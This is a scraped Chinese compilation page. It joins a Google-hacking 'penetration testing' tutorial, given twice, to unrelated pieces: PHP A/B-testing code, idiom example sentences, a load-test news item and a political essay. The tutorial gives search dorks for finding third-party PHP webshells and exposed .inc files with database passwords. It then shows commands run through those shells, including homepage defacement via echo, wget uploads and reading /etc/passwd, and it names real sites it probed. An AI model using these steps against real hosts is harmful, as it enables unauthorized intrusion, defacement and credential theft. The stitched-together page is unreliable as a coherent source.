用google来进行“渗透测试”
“秘密秘秘秘”通过精心收集,向本站投稿了7篇用google来进行“渗透测试”,下面是小编帮大家整理后的用google来进行“渗透测试”,希望对大家有所帮助。
篇1:用google来进行渗透测试
我们今天渗透测试人员在实施攻击之前,往往会先进行信息搜集工作,而后才是漏洞确认和最终的漏洞利用、扩大战果,在这里我们现在要谈的是:
一、利用google查找被人安装了php webshell后门的主机,并测试能否使用;
二、利用google查找暴露出来的INC敏感信息.
OK,现在我们开始:
1.查找利用php webshell
我们在google的搜索框中填入:
Code:
intitle:“php shell*” “Enable stderr” filetype:php
(注: intitle―网页标题 Enable stderr―UNIX标准输出和标准错误的缩写filetype―文件类型)。搜索结果中,你能找到很多直接在机器上执行命令的web shell来。如果找到的PHPSHELL不会利用,如果你不熟悉UNIX,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明的是,我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填写搜索的内容不同)。通过我的检测,这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:
Code:
echo “召唤” > index.jsp
在得到的
Code:
echo
后再写上:“召唤”
现在看看首页,已经被我们改成: “召唤” 了
我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file > index.html or echo “” > file
echo “test” >> file
这样一条条打出来,站点首页就成功被替换了。同样的也可以
Code:
uname -a;cat /etc/passwd
不过有点要注意,有些WEBSHELL程序有问题,执行不了的,比如:
www.al3toof.com/card/smal ... c_html&command=
ramsgaard.net/upload/shell.php
这些站的php是global register off
解决方案:
我们可以利用相关工具进行在互联网进行搜索,如果有信息被滥用,到www.google.com/remove.html 提交你希望删除的信息,
控制搜索引擎机器人的查询.
2.搜索INC敏感信息
我们在google的搜索框中填入:
Code:
.org filetype:inc
我们现在搜索的是org域名的站点的INC信息(因为google屏蔽掉了搜索“COM”信息,我们还可以搜其他gov,cn,info,tw,jp,edu等等之类的)
PS:我在看许多PHP编程人员在编程时候,都喜欢把一些常写的代码或配置信息,写在一个.inc的文件中,如shared.inc、global.inc、conn.inc等等,当然这是一个很好的习惯,包括PHP 都是如此,但不知你有没有注意到这里面含一个安全隐患问题。
我有一次在写一个PHP代码时,无意中写错了一句话,当我在浏览器里查看此PHP文件时,竟然发现屏幕详细的显示了我所出错的PHP文件路径及代码行,
(PHP错误显示配置是开着的.此功能在PHP里是默认的!),这就是说当我们无意写错代码(同样.inc文件也一样) 或者PHP代码解析出问题时,而PHP错误显示又是开着的,客户端的用户就会看到具体url地址的.inc文件。
而.url文件如同txt文本一样,当在浏览器中浏览时,就毫无保留地显示了它的内容,而且不少站点在.inc文件写了重要的信息如用户密码之类!包括国内著名海尔公司以及嘉铃摩托公司,我之所以敢公布是因为我本人测试过,www.haier.com/su ***/inc/conn.inc 暴出的数据库ID密码用客户端连不上去,网站关闭了1215,而且防火墙也过滤掉了。
好,INC的知识说完后,我们继续又搜索到了好多,找到一个暴露了MYSQL口令的
我们又可以用客户端登陆上去修改数据了.这里涉及到数据库的知识,我们不谈太多,关于“INC暴露敏感信息”就到这里结束吧
当然我们可以通过一些办法解决:
1,你可以专门对.inc文件进行配置,避免用户直接获取源文件。
2,当然比较好的方法是,加上并且改文件扩展名为.php(PHP可以解析的扩展名),这样客户端就不会获取源文件了。
这里,我将FreeMind绘制的图片用文本表示了.
有关Google Hack的详细信息,帮助我们分析踩点
连接符:
Code:
+ - : . * |
操作符:
Code:
“foo1 foo2”
filetype:123
site:foo.com
intext:foo
intitle:footitle
allinurl:foo
密码相关
Code:
:“index of”
htpasswd / passwd
filetype:xls username password email
“ws_ftp.log”
“config.php”
allinurl:admin mdb
service filetype:pwd (frontpage)
敏感信息:
Code:
“robots.tx”
“disallow:”
filetype:txt
inurl:_vti_cnf (frontpage files)
allinurl:/msadc/samples/selector/showcode.asp
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:phpsysinfo
ipsec filetype:conf
intitle:“error occurred” odbc request where (select|insert)
“mydomain.com” nessus report
“report generated by”
结尾:
如果要拿ROOT权限就要具体问题具体分析了,不过有了SHELL权限就好提了,网上有很多根据WEBSHELL提升权限的文章大家可以参照一下。
篇2:用google来进行“渗透测试”漏洞预警
黑暗访问者
我们今天渗透测试人员在实施攻击之前,往往会先进行信息搜集工作,而后才是漏洞确认和最终的漏洞利用、扩大战果,在这里我们现在要谈的是:
一、利用google查找被人安装了php webshell后门的主机,并测试能否使用;
二、利用google查找暴露出来的INC敏感信息.
OK,现在我们开始:
1.查找利用php webshell
我们在google的搜索框中填入:
Code:
intitle:“php shell*” “Enable stderr” filetype:php
(注: intitle―网页标题 Enable stderr―UNIX标准输出和标准错误的缩写filetype―文件类型)。搜索结果中,你能找到很多直接在机器上执行命令的web shell来。如果找到的PHPSHELL不会利用,如果你不熟悉UNIX,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明的是,我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填写搜索的内容不同)。通过我的检测,这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:
Code:
echo “召唤” > index.jsp
在得到的
Code:
echo
后再写上:“召唤”
现在看看首页,已经被我们改成: “召唤” 了。
我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file > index.html or echo “” > file
echo “test” >> file
这样一条条打出来,站点首页就成功被替换了。同样的也可以
Code:
uname -a;cat /etc/passwd
不过有点要注意,有些WEBSHELL程序有问题,执行不了的,比如:
***www.al3toof.com/card/smal ... c_html&command=
***ramsgaard.net/upload/shell.php
这些站的php是global register off 解决方案:
我们可以利用相关工具进行在互联网进行搜索,如果有信息被滥用,到***www.google.com/remove.html提交你希望删除的信息,控制搜索引擎机器人的查询.
2.搜索INC敏感信息
我们在google的搜索框中填入:
Code:
.org filetype:inc
我们现在搜索的是org域名的站点的INC信息(因为google屏蔽掉了搜索“COM”信息,我们还可以搜其他gov,cn,info,tw,jp,edu等等之类的)
PS:我在看许多PHP编程人员在编程时候,都喜欢把一些常写的代码或配置信息,写在一个.inc的文件中,如shared.inc、global.inc、conn.inc等等,当然这是一个很好的习惯,包括PHP 都是如此,但不知你有没有注意到这里面含一个安全隐患问题。我有一次在写一个PHP代码时,无意中写错了一句话,当我在浏览器里查看此PHP文件时,竟然发现屏幕详细的显示了我所出错的PHP文件路径及代码行。(PHP错误显示配置是开着的.此功能在PHP里是默认的!),这就是说当我们无意写错代码(同样.inc文件也一样) 或者PHP代码解析出问题时,而PHP错误显示又是开着的,客户端的用户就会看到具体url地址的.inc文件,而.url文件如同txt文本一样,当在浏览器中浏览时,就毫无保留地显示了它的内容,而且不少站点在.inc文件写了重要的信息如用户密码之类!包括国内著名海尔公司以及嘉铃摩托公司,我之所以敢公布是因为我本人测试过,***www.haier.com/su ***/inc/conn.inc 暴出的数据库ID密码用客户端连不上去,网站关闭了1215,而且防火墙也过滤掉了,
INC的知识说完后,我们继续又搜索到了好多,找到一个暴露了MYSQL口令的,我们又可以用客户端登陆上去修改数据了。这里涉及到数据库的知识,我们不谈太多,关于“INC暴露敏感信息”就到这里结束吧;当然我们可以通过一些办法解决:
1,你可以专门对.inc文件进行配置,避免用户直接获取源文件。
2,当然比较好的方法是,加上并且改文件扩展名为.php(PHP可以解析的扩展名),这样客户端就不会获取源文件了。
这里,我将FreeMind绘制的图片用文本表示了。
有关Google Hack的详细信息,帮助我们分析踩点
连接符:
Code:
+ - : . * │
操作符:
Code:
“foo1 foo2”
filetype:123
site:foo.com
intext:foo
intitle:footitle
allinurl:foo
密码相关
Code:
:“index of”
htpasswd / passwd
filetype:xls username password email
“ws_ftp.log”
“config.php”
allinurl:admin mdb
service filetype:pwd (frontpage)
敏感信息:
Code:
“robots.tx”
“disallow:”
filetype:txt
inurl:_vti_cnf (frontpage files)
allinurl:/msadc/samples/selector/showcode.asp
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:phpsysinfo
ipsec filetype:conf
intitle:“error occurred” odbc request where (select│insert)
“mydomain.com” nessus report
“report generated by”
结尾:
如果要拿ROOT权限就要具体问题具体分析了,不过有了SHELL权限就好提了,网上有很多根据WEBSHELL提升权限的文章大家可以参照一下。
通过google我们还可以搜索到很多有用的东西,不过是细节,要通过信息收集慢慢分析、扩大、进行入侵.这些我就不具体分析了。给大家个思路,大家慢慢研究好了到这里,这篇文章就要结束了,写这篇文章的目的是为了引起大家的关注与重视,了解新的HACK手段,了解新的防护方法,事物都有两面性,在当今Google盛行的时代,在充分利用google的同时.也应该看得更全面。
篇3:用Google Analytics 做A/B 测试
最近正在给一个电子商务的客户做条幅广告转化率的测试,但我们发现数据有问题:Website Optimizer 工具不能对部分消费者的具体行为测...
最近正在给一个电子商务的客户做条幅广告转化率的测试,但我们发现数据有问题:Website Optimizer 工具不能对部分消费者的具体行为测试进行设置,我们需要知道有多少人点击了测试广告,以及有多少发生了购买。
我们的解决方案是添加一些新的代码,来确定谁看到了什么,让 Google Analytics 里的群体来实现这一方面数据的监控。通过这种方法我们能够更全面的了解任何给定测试,更准确地确定投资回报率。
A/B测试
添加代码之前我们先回顾一下测试样本的背景。你运营的是一家销售耳机的网站,现在想要测试下某新款高端耳机的两版本的首页。你用A/B实验来换掉了原先的首页,重要的是获得尽可能多的收入。
将消费者体验简化后看起来会是像这样的路径:
如果我们只使用 Website Optimizer工具就会有问题,从哪一点到哪算是转化呢?在 Website Optimizer 中我们只能选择一个A点和一个B点,我们无法跟踪整个渠道中客户的路径。这就是我们努力要克服的障碍。如果只是单一点到点的的跟踪,我们只能选择以下项目之一来衡量:
访客是否有点击条幅广告?
访客是否添加产品到购物车?
访客是否发生购买行为?
但事实上没有哪个一个单一的转化能说明全部问题,我们需要更多信息。
开始动手
Website Optimizer 确实是跟踪任意一个路径的绝好工具,但它无法追踪所有,不过幸好 GA 可以。我们的目标则是建立一个可以跟踪所有路径的易用系统,帮助我们确定会在哪个环节流失客户。
我将我们使用的PHP代码一并给了出来,对你也许会有些帮助。如果你对编码工作没什么概念,下面的PHP代码可能会让你有些头疼。简单来说,这段代码就是起到了以下作用:
我们是要确保,如果用户回访时A/B测试仍在继续进行的话,他们能有和上次访问相同的体验。
class SplitTest
{
public $strSelected = “”;
public function __construct($strCookie, $arrShuffle, $strOverride, $datCookieAge=null)
{
$datCookieAge = empty($datCookieAge) ? time+60*60*24*7 : $datCookieAge;
// Code for segmenting to track in Analytics
$strSelected = sanitizeInput($strOverride);
$strSelected = isset($_COOKIE[$strCookie]) && empty($strSelected) ? $_COOKIE[$strCookie] : $strSelected;
// If still empty, randomize it.
if (empty($strSelected))
{
shuffle($arrShuffle);
$strSelected = $arrShuffle[0];
}
if (!in_array($strSelected, $arrShuffle))
{
$strSelected = $arrShuffle[0];
}
$this->strSelected = $strSelected;
setcookie($strCookie, $strSelected, $datCookieAge);
}
}
你会需要调用以下代码:
$arrShuffle = array(“layout1″, ”layout2″);
$SplitTest = new SplitTest(“layoutTestName”, $arrShuffle, “variableName”);
$strWhichVersionToShow = $SplitTest->strSelected;
?>
if ($strWhichVersionToShow == “layout1″)
{
// Show the first layout here
}
elseif ($strWhichVersionToShow == ”layout2″)
{
// Show the second layout here
}
?>
厚诚集智 成长无限 www.51hlht.com
篇4:用贻笑大方来进行造句
【成语】:贻笑大方
【拼音】:yíxiàodàfāng
【解释】:贻笑:让人笑话;大方:原指懂得大道理的人,后泛指见识广博或有专长的人。指让内行人笑话。
举例造句】:去岁路过贵邦,就要登堂求教;但愧知识短浅,诚恐贻笑大方,所以不敢冒昧进谒。
【近义词】:见笑大方、遗笑大方
【用法】:作谓语、宾语、定语;用于自谦
【英文】:giveanexpertcauseforlanghter
【故事】秋天里山洪按照时令汹涌而至,众多大川的水流汇入黄河,河面宽阔波涛汹涌,两岸和水中沙洲之间连牛马都不能分辨。于是河神欣然自喜,认为天下一切美好的东西全都聚集在自己这里。河神顺着水流向东而去,来到北海边,面朝东边一望,看不见大海的尽头。于是河神方才改变先前洋洋自得的面孔,面对着海神若仰首慨叹道:“俗语有这样的说法,‘听到了上百条道理,便认为天下再没有谁能比得上自己’,说的就是我这样的人了。而且我还曾听说过孔丘懂得的东西太少、伯夷的高义不值得看重的话语,开始我不敢相信;如今我亲眼看到了你是这样的浩淼博大、无边无际,我要不是因为来到你的门前,真可就危险了,我必定会贻笑大方。”
篇5:用贻笑大方来进行造句
一、这些油画水准不高,或可用来自娱,如果拿去参展,恐怕要贻笑大方。
二、就好像是河伯在海神若之前的叹息一般,这个少爷还真就是贻笑大方之家了。
三、席间爆出许多笑声,侍御史尹大人更是脸色铁青,这尹晴儿平日骄纵,胸无点墨,如今出了这么个俗不可耐的对子真是贻笑大方。
四、呵呵,说不出,那不就贻笑大方了啊,这和民间熟语“脱裤子放个屁”有什么区别!怕后人讥笑,就免了吧。
五、有时候,用词不当不但会贻笑大方,还可能造成商务上或政治上的误解。
六、做井底之蛙只会贻笑大方,多多望洋兴叹才会提升自己。
七、南郭先生本来不会吹竽,可是他装模作样地混在乐队里充数,结果闹个贻笑大方的可悲下场。
八、我常常思考这样一个的问题,如果一个人不能将所学的理论与实践相结合,那么你就有可能闹出不辨菽麦,让人贻笑大方的事情来。
九、师妹丰姿依然,师兄我可是受宠若惊,自当倾尽薄技,只怕贻笑大方,师妹可要多点鼓励。
十、唉,李家这回可真是贻笑大方之家。
十一、我是个外行,我说的话可能贻笑大方,可我还是要说几句。
十二、他这样做是鲁班门前弄斧子,实在是贻笑大方。
十三、试驾现场有工作人员讲解怎样去试车,但在这方面不甚专业的我还是不敢班门弄斧,以免贻笑大方。
十四、他不懂装懂,还班门弄斧,做了贻笑大方之事还不知道。
十五、南郭先生弄虚作假,冒充吹竽手,最后落得个逃之夭夭,贻笑大方的下场。
十六、在专家学者面前还是别随便发表意见,以免贻笑大方。
十七、发表意见之前要先确实求证,免得出了错误,贻笑大方。
十八、假如发起另一场全国运动,可有帮助?我希望永远不须依赖运动来推进文明,否则必然贻笑大方,成为世人的'话柄。
十九、阁下的做法,与梁上君子有何分别,偷听他人谈话,岂不是贻笑大方!
二十、如果编导者没有超越经典的能力,那就最好别糟改经典,以免贻笑大方,遗误后人。
二十一、我对于这门学科知道得很少,随便发议论会贻笑大方的。
二十二、以前的梦想总是那么的遥远,卑微,甚至说是不切实际,如果让朋友知道简直贻笑大方。
二十三、这个世界的徽章,那是有地位人的玩意,如果平民给自己挂上徽章,那绝对贻笑大方,被人传为笑谈。
二十四、像你这样什么都不懂,却爱自吹自擂,也不怕贻笑大方?
二十五、不要搞些花狸狐哨的东西,只能贻笑大方。
二十六、如此看来,借名钓利也是一门技术活,操作不慎只会贻笑大方。
二十七、原首发于榕树、红袖添香、新青年、养城专栏等网络文学阵地,现整理于此,同时也将首次上传部分早年作品,贻笑大方,供大家娱乐玩赏。
二十八、后出师表已经说的很清楚了,王业不偏安,汉贼不两立,惟坐待亡,孰于伐之!可笑后世的一些历史小白们还在那里贻笑大方。
二十九、同学们的造句或小中见大、或引经据典,我不敢班门弄斧与之媲美,也不愿步人后尘,贻笑大方。
三十、人家对自己一片赤诚,可笑自己却以小人之心度君子之腹,自以为养虎为患,还挖空心思想着如何对付别人!当真贻笑大方!
三十一、演讲者所举事例张冠李戴,真个贻笑大方。
三十二、古之人“千金市骨”,买者自愿,所买者信义,所成者事业,所留者仰慕;今之校重金买报道,买者无奈,所买者无聊,所成者空虚,所留者,贻笑大方罢了。
三十三、只是我们家有一个老头子喜欢种一点土茶,自小便跟着摘茶,略懂了一点,与老师相比便是小巫见大巫,贻笑大方之家了。
三十四、在正规的西餐宴会上,使用刀、叉一定要中规中矩,不然就会洋相百出,贻笑大方。
三十五、虽才学粗陋,写来难免贻笑大方,只是心痒难挠,不叙之文字,日夜难安。
三十六、井底之蛙也自称博古通今,真是贻笑大方。
三十七、这下可贻笑大方了,那照片的真假也就不攻自破。
三十八、有的时候,误用成语是会贻笑大方的.
三十九、她拿自己那篇很不像样的文章到处宣杨,也不怕贻笑大方?
四十、做人要懂得怡然自乐的享受,也需要义不容辞地去担当责任,不能终日异想天开,否则只能贻笑大方。
四十一、这简直是贻笑大方,丘洛也不怕闪了舌头,要是丘射的悟性好,这么几年木之剑意也不会原地踏步了。
四十二、对此,美国侨报网发表文章称,递条子、打招呼、卖面子,中国自古有之,但在法治时代,这种观念不但贻笑大方,且祸国殃民。
四十三、我的意见很不成熟,不敢说出来,怕的是贻笑大方。
四十四、他小有成就便显得不可一世,难免贻笑大方之家。
四十五、尽管你听到什么“惊天动地”的趣事,在社交宴会也得要保持仪态,顶多报以灿烂笑容即可,不然就贻笑大方了。
四十六、其实,到头来适得其反,只落个贻笑大方,也只能在自己的“世袭领地”里自我安慰、自我美化或互相捧场罢了。
四十七、看来,总统先生明智的做法是在月日联合国大会之前,再斟酌一下他的演讲辞,免得贻笑大方。
四十八、但古典诗词,每首平仄韵不得通用,错用一韵就贻笑大方,而散曲可以平仄混押,大大解放了作者手脚,使诗歌的路数更为宽广。
四十九、这些油画水准不高,或可用来自娱,如果拿去参展,恐怕要贻笑大方。也难怪会被记过。
篇6:Google App Engine进行公开的负载测试
今天(5月23日)下午4点(GMT+2),大约一小时之内,在qwerty.codathlon.com上有一场关于Google App Toolkit的公开负载测试,
Google Web Toolkit和RIA专家Didier Girard已经构建了一个简单的GWT应用并放在Google App Engine上了。他相当自信地认为他的应用可以经受住高负载的考验。
我并没有对这个应用做过特别的优化。我是说我尽量避免常见的瓶颈,但是我像大多数开发者一样去编码。我相当自信地认为Google App Engine能经受住高负载的考验。并且我还认为GWT对于高负载来说是相当适合的。现在,检验它的时刻到来了。从现在开始的一小时内,他期望有几千访问者。
我的目标就是在10分钟内能达到4000个独立访问者,管理资料
我想这相当于一天内有100000个独立访问者:100000 / 4 小时/ 6。这可能还不够,但是我认为这足够证明99.9%的站点可以采用GWT实现并放在GAE上,根本不用去考虑衰减效应。如果你想成为这其中的一员,请于5月23日周五下午4点左右(GMT+2,取决于你的时区)访问“qwerty.codathlon.com”。如果你想帮我,那就多做些宣传吧。Google App Engine上的Google Web Toolkit能够借助InfoQ效应吗?让我们拭目以待。
查看英文原文:Google App Engine public load test today
来自:www.infoq.com/cn/news//05/google-app-engine-load-test
篇7:用宪政来进行统治者驯化
用宪政来进行统治者驯化
人类对动物和普通成员的驯化取得了空前的成功,但对统治者的驯化堪称进展缓慢,只是在过去的一千年中才取得了一些实质性的进展。人类对野生动物的驯服,在文明史中已有了大量的记载。 但是与这一进程同步进行的另一个进程,即人类对自身的驯化,却 较少受到关注,而后者远比前者重要得多。一个社会,不论它把动物驯化得多么好,只要这个社会成员自身的野性未脱,这个社会仍然不能算是一个文明社会。
统治者与政府是迄今为止所发明的驯化人类普通成员的最有效的手段。为了镇制普通民众身上的野性,统治者建立了一整套的暴力机器,对任意发作野性的人进行武力的强制。让政府用暴力的手段来压制野性,在政治学中被称为是“野蛮的发现”。但是,当人 们成功地找到了驯服被统治者身上的野性的途径之后,却被一个更大的、空前的挑战所困扰:如何驯服自己的统治者?统治者及其操控的政府的确是统治和驯化普通民众的有效工具。可是,无论被神化到什么程度,统治者和政府成员都是凡人。统治者用政府约束凡 人的'野性,可是,一旦治人者野性发作,谁来约束、制止呢?历史 一再表明,由于手中掌握著暴力工具,统治者的专横权力一旦失去 控制,其所带来的灾难性后果,远非普通人的野性发作所能比拟。
直至今日的人类的全部进化历史表明,人类既离不开统治者, 又不能不驯化统治者。一部人类政治史,在一定程度上就是从“猴 王”到人王的进化史。灵长动物学研究表明,现在像猴子、猩猩、 狒狒、长臂猿等灵长动物,都过著人类的祖先曾经过著的那种群居 生活。大多数灵长动物的社会,是围绕著一个可以称为首领的统治 者而组织起来的,如猴子就是围绕著“猴王”来结群生活的。这样的首领通常至高无上。灵长动物社会的本质,就是在首领的暴力基础之上建立起来的,统治秩序的建立消除了自相残杀。人类社会中的政权最初也可以追溯到那个作为“君王”的统治者身上。由于不必再把精力浪费在自相残杀上,整个群体就能致力于合作性事物-采集食物和保卫地盘。这样,也就迈开了走向有组织的社会生活的第一步。
然而,靠暴力建立起来的“君王”统治不可避免地通过暴力来更迭。从猿猴社会到二十世纪的专制政权都历来如此。猴王权力的更迭即便是流血的,却不大可能是致命的,更不会残害无辜者。而人类社会中行暴政的统治者们不仅制造流血,而且使千万无辜的人 沦为受害者乃至丧失生命。这种政权便取代了猛兽而成为人类生存 的最大敌人。猿猴过专制生活是为了最大限度地获得生存机会,而现代的暴政统治者是要最大限度地剥夺人类的生存机会。如果不能成功地驯服,“人王”比“猴王”要野蛮得多。二十世纪中非统治 者博卡萨在现代条件下居然保留著“食人”习性,就是最好不过的例证。博卡萨之所以可怕,正是因为他掌握的是整个国家的暴力机器。而且,越是这样的统治者越是想取得对暴力机器的彻底控制。 权力越专横,野性的成分就越多。
直到有效地驯服统治者的手段发明之前,人们对统治者们的野性几乎束手无策。要么是以暴易暴,陷于恶性循环,要么是无力的道德说教。而对不中听的说教,统治者们轻则像齐宣王那样“顾左右而言他”,重则像纣王那样让比干剖心而死。
在人类的五千年文明中,在驯化方面取得的进展是很不均衡的。对动物和人类普通成员的驯化已经取得了空前的成功,并全面完成。对普通民众的驯化也早已走上了制度化的轨道。
[1] [2] [3]
【用google来进行“渗透测试”】相关文章:
1.渗透测试的介绍
3.用适宜来造句
4.用阳春白雪来造句
5.用诚信来造句
6.用静谧来造句
7.用无妄之灾来造句
8.用自寻烦恼来造句
9.用单刀直入来造句
10.用冒险来造句






文档为doc格式